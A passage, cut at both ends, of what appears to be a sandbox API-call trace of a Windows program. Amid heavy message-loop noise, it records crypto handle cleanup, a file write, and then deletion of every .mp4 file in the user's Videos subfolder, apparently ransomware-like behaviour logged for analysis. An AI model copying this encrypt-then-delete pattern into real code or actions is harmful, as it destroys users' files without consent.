hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.788] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.788] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.789] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.790] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.790] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.790] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.790] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.790] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.790] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.790] WriteFile (in: hFile=0x504, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0212.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.792] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.792] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.792] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.792] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.792] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.792] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.792] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.792] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab6e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.793] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0212.793] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.793] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.793] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.793] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.793] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.793] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.793] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.793] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.793] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.793] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.793] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.793] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.794] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.794] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.794] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.794] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.794] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.794] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.794] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.794] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0212.795] CryptReleaseContext (hProv=0xa7c198, dwFlags=0x0) returned 1 [0212.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.795] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0212.795] FreeLibrary (hLibModule=0x76390000) returned 1 [0212.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.796] CloseHandle (hObject=0x504) returned 1 [0212.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.796] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.796] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0212.796] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0212.796] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/PkICTcvFSPf3s9J", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J", lpFilePart=0x8cedf4*="PkICTcvFSPf3s9J") returned 0x26 [0212.796] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j")) returned 0x10 [0212.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57202740, ftCreationTime.dwHighDateTime=0x1d5ccf0, ftLastAccessTime.dwLowDateTime=0x3e85ef50, ftLastAccessTime.dwHighDateTime=0x1d5d1ad, ftLastWriteTime.dwLowDateTime=0x3e85ef50, ftLastWriteTime.dwHighDateTime=0x1d5d1ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e2138 [0212.796] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x57202740, ftCreationTime.dwHighDateTime=0x1d5ccf0, ftLastAccessTime.dwLowDateTime=0x3e85ef50, ftLastAccessTime.dwHighDateTime=0x1d5d1ad, ftLastWriteTime.dwLowDateTime=0x3e85ef50, ftLastWriteTime.dwHighDateTime=0x1d5d1ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0212.796] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17cabd10, ftCreationTime.dwHighDateTime=0x1d5cf9f, ftLastAccessTime.dwLowDateTime=0x294fecc0, ftLastAccessTime.dwHighDateTime=0x1d5d4c4, ftLastWriteTime.dwLowDateTime=0x294fecc0, ftLastWriteTime.dwHighDateTime=0x1d5d4c4, nFileSizeHigh=0x0, nFileSizeLow=0x123a, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="GdSfpHuE2dAzznl5qe.mp4", cAlternateFileName="GDSFPH~1.MP4")) returned 1 [0212.797] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J\\GdSfpHuE2dAzznl5qe.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j\\gdsfphue2dazznl5qe.mp4")) returned 1 [0212.799] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0972160, ftCreationTime.dwHighDateTime=0x1d5c7d5, ftLastAccessTime.dwLowDateTime=0x74417260, ftLastAccessTime.dwHighDateTime=0x1d5d633, ftLastWriteTime.dwLowDateTime=0x74417260, ftLastWriteTime.dwHighDateTime=0x1d5d633, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Ohp0.mp4", cAlternateFileName="")) returned 1 [0212.799] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J\\Ohp0.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j\\ohp0.mp4")) returned 1 [0212.801] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a2ec4d0, ftCreationTime.dwHighDateTime=0x1d5cf29, ftLastAccessTime.dwLowDateTime=0x882222f0, ftLastAccessTime.dwHighDateTime=0x1d5d04f, ftLastWriteTime.dwLowDateTime=0x882222f0, ftLastWriteTime.dwHighDateTime=0x1d5d04f, nFileSizeHigh=0x0, nFileSizeLow=0x73cb, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Rj8OL14rj_ONIumpx9.mp4", cAlternateFileName="RJ8OL1~1.MP4")) returned 1 [0212.801] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J\\Rj8OL14rj_ONIumpx9.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j\\rj8ol14rj_oniumpx9.mp4")) returned 1 [0212.803] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2487e8e0, ftCreationTime.dwHighDateTime=0x1d5d30d, ftLastAccessTime.dwLowDateTime=0xed66d8d0, ftLastAccessTime.dwHighDateTime=0x1d5d5cd, ftLastWriteTime.dwLowDateTime=0xed66d8d0, ftLastWriteTime.dwHighDateTime=0x1d5d5cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Yd8okKDG89CP", cAlternateFileName="YD8OKK~1")) returned 1 [0212.803] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15dc6ed0, ftCreationTime.dwHighDateTime=0x1d5cbb3, ftLastAccessTime.dwLowDateTime=0xb5d1ad00, ftLastAccessTime.dwHighDateTime=0x1d5cc13, ftLastWriteTime.dwLowDateTime=0xb5d1ad00, ftLastWriteTime.dwHighDateTime=0x1d5cc13, nFileSizeHigh=0x0, nFileSizeLow=0x17ca0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ykv9UCPpXlE47a.mp4", cAlternateFileName="YKV9UC~1.MP4")) returned 1 [0212.803] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\PkICTcvFSPf3s9J\\ykv9UCPpXlE47a.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\pkictcvfspf3s9j\\ykv9ucppxle47a.mp4")) returned 1 [0212.856] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15dc6ed0, ftCreationTime.dwHighDateTime=0x1d5cbb3, ftLastAccessTime.dwLowDateTime=0xb5d1ad00, ftLastAccessTime.dwHighDateTime=0x1d5cc13, ftLastWriteTime.dwLowDateTime=0xb5d1ad00, ftLastWriteTime.dwHighDateTime=0x1d5cc13, nFileSizeHigh=0x0, nFileSizeLow=0x17ca0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ykv9UCPpXlE47a.mp4", cAlternateFileName="YKV9UC~1.MP4")) returned 0 [0212.856] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.857] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0212.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 